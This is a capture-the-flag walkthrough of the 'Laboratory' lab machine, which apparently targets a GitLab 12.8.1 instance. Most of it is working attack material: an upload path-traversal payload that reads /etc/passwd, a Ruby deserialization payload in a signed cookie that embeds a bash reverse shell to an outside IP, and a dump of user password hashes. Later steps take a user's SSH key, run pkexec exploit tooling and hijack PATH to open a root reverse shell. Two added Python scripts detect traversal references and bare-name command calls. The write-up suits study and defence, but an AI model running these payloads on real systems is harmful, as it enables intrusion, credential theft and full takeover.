[Meachines] [Easy] Laboratory GitLab v12.8.1 LFI + Ruby Deserialization RCE + Lateral Movement + TRP00F Privilege…

2025-02-28

Information Gathering

IP Address      Open Ports
10.10.10.216    TCP: 22, 80, 443

$ ip='10.10.10.216'; itf='tun0'; if nmap -Pn -sn "$ip" | grep -q "Host is up"; then echo -e "\e[32m[+] Target $ip is up, scanning ports...\e[0m"; ports=$(sudo masscan -p1-65535,U:1-65535 "$ip" --rate=1000 -e "$itf" | awk '/open/ {print $4}' | cut -d '/' -f1 | sort -n | tr '\n' ',' | sed 's/,$//'); if [ -n "$ports" ]; then echo -e "\e[34m[+] Open ports found on $ip: $ports\e[0m"; nmap -Pn -sV -sC -p "$ports" "$ip"; else echo -e "\e[31m[!] No open ports found on $ip.\e[0m"; fi; else echo -e "\e[31m[!] Target $ip is unreachable, network is down.\e[0m"; fi

PORT    STATE SERVICE  VERSION
22/tcp  open  ssh      OpenSSH 8.2p1 Ubuntu 4ubuntu0.1 (Ubuntu Linux; protocol 2.0)
| ssh-hostkey: 
|   3072 25ba648f799d5d95972c1bb25e9b550d (RSA)
|   256 2800890555f9a2ea3c7d70ea4dea600f (ECDSA)
|_  256 7720ffe946c068921a0b2129d153aa87 (ED25519)
80/tcp  open  http     Apache httpd 2.4.41
|_http-server-header: Apache/2.4.41 (Ubuntu)
|_http-title: Did not follow redirect to https://laboratory.htb/
443/tcp open  ssl/http Apache httpd 2.4.41 ((Ubuntu))
|_http-server-header: Apache/2.4.41 (Ubuntu)
| tls-alpn: 
|_  http/1.1
|_ssl-date: TLS randomness does not represent time
|_http-title: The Laboratory
| ssl-cert: Subject: commonName=laboratory.htb
| Subject Alternative Name: DNS:git.laboratory.htb
| Not valid before: 2020-07-05T10:39:28
|_Not valid after:  2024-03-03T10:39:28
Service Info: OS: Linux; CPE: cpe:/o:linux:linux_kernel

GitLab-v12.8.1 LFI

# echo '10.10.10.216 laboratory.htb git.laboratory.htb' >>/etc/hosts

https://laboratory.htb/


https://git.laboratory.htb/users/sign_in


Register a user and log in


https://git.laboratory.htb/help


https://hackerone.com/reports/827052

Create two projects, A and B


In project A, create an issue whose description contains:

![a](/uploads/11111111111111111111111111111111/../../../../../../../../../../../../../../etc/passwd)


Move the issue to project B; the moved issue's rewritten upload reference now resolves outside the uploads directory.
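As an added defensive check (not part of the write-up or of GitLab's own code), the following script scans issue markdown for upload references whose path escapes /uploads/<hash>/ once normalised, which is the pattern this traversal relies on; the function name and the sample issue body are constructed for illustration.

```python
import posixpath
import re
from urllib.parse import unquote

# Markdown image/link references into GitLab's upload store, e.g. ![a](/uploads/<hash>/file.png).
UPLOAD_REF = re.compile(r"!?\[[^\]]*\]\((/uploads/[^)\s]+)\)")
# A legitimate upload reference is exactly /uploads/<32 hex chars>/<file name>.
UPLOAD_DIR = re.compile(r"^/uploads/[0-9a-f]{32}/[^/]+$")


def find_traversal_refs(markdown: str) -> list[str]:
    """Return upload references that would escape /uploads/<hash>/ when resolved on disk."""
    flagged = []
    for m in UPLOAD_REF.finditer(markdown):
        raw = m.group(1)
        decoded = unquote(raw)  # also catch %2e%2e-style encoding of the dot-dot segments
        resolved = posixpath.normpath(decoded)
        if ".." in decoded.split("/") or not UPLOAD_DIR.match(resolved):
            flagged.append(raw)
    return flagged


# Constructed issue body: one benign attachment plus the traversal reference from the write-up.
SAMPLE_ISSUE = (
    "Build log attached.\n"
    "![log](/uploads/0123456789abcdef0123456789abcdef/build.log)\n"
    "![a](/uploads/11111111111111111111111111111111/../../../../../../../../../../../../../../etc/passwd)\n"
)

if __name__ == "__main__":
    for ref in find_traversal_refs(SAMPLE_ISSUE):
        print("traversal in upload reference:", ref)
```

The same check can run as a pre-move validation hook or over existing issue bodies when hunting for past abuse.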


Ruby-deser secret_key_base RCE

Set up a local GitLab 12.8.1 instance (same version as the target) to generate the payload

https://packages.gitlab.com/gitlab/gitlab-ce/packages/ubuntu/xenial/gitlab-ce_12.8.1-ce.0_amd64.deb

$ gitlab-ctl reconfigure

$ gitlab-ctl restart

$ gitlab-rails console

request = ActionDispatch::Request.new(Rails.application.env_config)
request.env["action_dispatch.cookies_serializer"] = :marshal   # force Marshal (not JSON) so the proxy object is serialised
erb = ERB.new("<%= `bash -c 'bash -i >& /dev/tcp/10.10.16.31/10032 0>&1'` %>")
depr = ActiveSupport::Deprecation::DeprecatedInstanceVariableProxy.new(erb, :result, "@result", ActiveSupport::Deprecation.new)
cookies = request.cookie_jar
cookies.signed[:cookie] = depr   # signed with this instance's secret_key_base
puts cookies[:cookie]

$ curl -vvv 'https://git.laboratory.htb/users/sign_in' -k -b "experimentation_subject_id=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- -8fdb57c5b65cef79b38c842cc0a42570ff756636"


Docker Escape (gitlab-rails): Lateral Movement

$ gitlab-rails console

users = User.all
users.each do |user|
  puts "ID: #{user.id}, Username: #{user.username}, Email: #{user.email}, Encrypted Password: #{user.encrypted_password}"
end

Promote our user to admin


user = User.find_by(username: 'map')
user.admin = true
user.save!

https://git.laboratory.htb/explore


https://git.laboratory.htb/dexter/securedocker/-/blob/master/dexter/.ssh/id_rsa


User.txt

9c2a8cd5962ffcbf1f56cd3ec5e6fde8

TRP00F

https://github.com/MartinxMax/trp00f

$ python3 trp00f.py --lhost 10.10.16.25 --lport 10000 --rhost 10.10.16.25 --rport 10032 --http 9999

[!] Do you want to exploit the vulnerability in file 'pkexec' ? (y/n) >y


Privilege Escalation: docker-security && chmod PATH hijack


$ nc 10.10.16.31 10011 </usr/local/bin/docker-security


PS: ltrace can be used to trace the library calls made by docker-security.

The usual approach here is to write "#!/bin/bash\n/bin/bash" to /tmp/chmod and then run $ export PATH=/tmp:$PATH, so that the bare "chmod" invocation resolves to the planted file instead of /usr/bin/chmod.

Here Tyrant will be used instead for persistent control.

Upload Tyrant to the target machine

https://github.com/MartinxMax/Tyrant

$ echo '/tmp/tyrant'>/tmp/chmod
$ /usr/bin/chmod +x chmod
$ /usr/bin/chmod +x tyrant
$ export PATH=/tmp:$PATH
$ /usr/local/bin/docker-security
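As an added defensive check (not from the write-up or the tools it uses), the following script audits ltrace-style output of a privileged helper for commands spawned by bare name, the exact condition that lets a writable PATH entry such as /tmp take precedence; the trace lines are constructed and the function name is an assumption.

```python
import re
import shlex

# ltrace-style lines look like  name("arg", ...) = ret ; these are the calls that spawn a command.
SPAWN_CALL = re.compile(r'^(?P<fn>system|popen|execvp|execlp|execvpe)\((?P<args>.*)\)\s*=')
# First double-quoted C string in the argument list (handles escaped quotes inside it).
FIRST_STRING = re.compile(r'"((?:[^"\\]|\\.)*)"')


def find_unqualified_commands(trace: str) -> list[tuple[str, str]]:
    """Return (library call, command) pairs where a command is spawned by bare name.

    system/popen hand the string to /bin/sh, which resolves the first word via PATH;
    execvp/execlp/execvpe resolve their first argument via PATH themselves.
    Anything containing a slash (absolute or ./relative) is not PATH-resolved and is skipped.
    """
    findings = []
    for line in trace.splitlines():
        m = SPAWN_CALL.match(line.strip())
        if not m:
            continue
        s = FIRST_STRING.search(m.group("args"))
        if not s:
            continue
        if m.group("fn") in ("system", "popen"):
            words = shlex.split(s.group(1))
            command = words[0] if words else ""
        else:
            command = s.group(1)
        if command and "/" not in command:
            findings.append((m.group("fn"), command))
    return findings


# Constructed ltrace output for a setuid helper in the spirit of docker-security:
# the first chmod is found via PATH (hijackable), the second is fully qualified (safe).
SAMPLE_TRACE = """\
setuid(0) = 0
system("chmod 700 /usr/bin/docker") = 0
system("/usr/bin/chmod 660 /var/run/docker.sock") = 0
execvp("docker", 0x7ffd1234) = -1
"""

if __name__ == "__main__":
    for fn, cmd in find_unqualified_commands(SAMPLE_TRACE):
        print(f"{fn}() spawns '{cmd}' by bare name: qualify it with an absolute path or set a fixed PATH first")
```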


Spawn a root reverse session

$ ./tyrant -uid 0 -rhost 10.10.16.31 -rport 4451


Root.txt

07456541386c4c220bac22b424b00f3b

